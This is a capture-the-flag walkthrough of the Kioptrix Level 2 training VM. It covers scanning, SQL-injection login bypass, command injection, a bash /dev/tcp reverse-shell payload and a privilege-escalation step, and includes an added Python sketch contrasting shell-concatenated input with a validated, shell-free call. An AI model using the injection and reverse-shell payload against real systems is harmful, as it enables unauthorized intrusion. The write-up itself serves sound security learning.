Monday, 11 July 2016

Kioptrix Level 2

This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

In this case I started by scanning all ports with service version detection.

First of all I checked port 111/tcp for NFS, but unfortunately for us NFS isn't in use. OpenSSH looks like a very old version, and Apache as well.
I didn't find any exploit for OpenSSH; for Apache I found one, but only a DoS, which is useless for us. I also tried to connect to the MySQL server, but I got the following response:

root@kali:~# mysql -u root -h
ERROR 1130 (HY000): Host '' is not allowed to connect to this MySQL server

So, let's go to the web application. The default web page has some kind of login form.

Great! There is an SQL injection vulnerability, and I obtained unauthorized access to the admin panel very easily.

and the response points out that there may be a Remote Code Execution vulnerability.

and let's perform a proof of concept.

It works! So, exploitation should be very easy.
I used the following payload:

; bash -i >& /dev/tcp/ 0>&1
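
The ';' in the payload above only has an effect if the application hands the form field to a shell. As an added example (not code from the original post or from the target application), this Python sketch contrasts that pattern with a validated, shell-free call. The echo stand-in for the real utility, the function names and the sample inputs are assumptions constructed for the demo.

```python
import ipaddress
import subprocess

# Assumption: the admin-panel feature runs a command-line utility on a
# user-supplied host. "echo" stands in for it so the demo is offline.
TOOL = "echo"


def run_unsafe(host: str) -> str:
    """Vulnerable pattern: input is concatenated into a shell command line,
    so ';' ends the intended command and starts a second one."""
    result = subprocess.run(f"{TOOL} {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_safe(host: str) -> str:
    """Hardened pattern: accept only a literal IP address, then pass an
    argv list with no shell, so metacharacters are never interpreted."""
    addr = ipaddress.ip_address(host.strip())  # raises ValueError otherwise
    result = subprocess.run([TOOL, str(addr)],
                            capture_output=True, text=True, check=True)
    return result.stdout


def is_rejected(host: str) -> bool:
    """True when the hardened handler refuses the input before execution."""
    try:
        run_safe(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    benign = "192.0.2.10"                    # constructed sample input
    chained = "192.0.2.10; echo INJECTED"    # constructed, same ';' chaining
    print("unsafe, benign :", run_unsafe(benign).splitlines())
    print("unsafe, chained:", run_unsafe(chained).splitlines())
    print("safe, benign   :", run_safe(benign).splitlines())
    print("safe, chained rejected:", is_rejected(chained))
```

Logging every rejected value gives the defender a record of probing attempts against the form.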

Amazing! We have got a limited shell. I examined the target OS version and found a dedicated exploit to escalate our privileges, but unfortunately it doesn't work.
So I examined the index.php file and noticed something useful.

Good! We have found valid credentials, so let's try to use them via SSH. Hmm, that doesn't work. I logged into the MySQL server and found credentials, but unfortunately they only work for MySQL. So, let's find another exploit for the OS.
We are able to use exploit from and get root.

Game over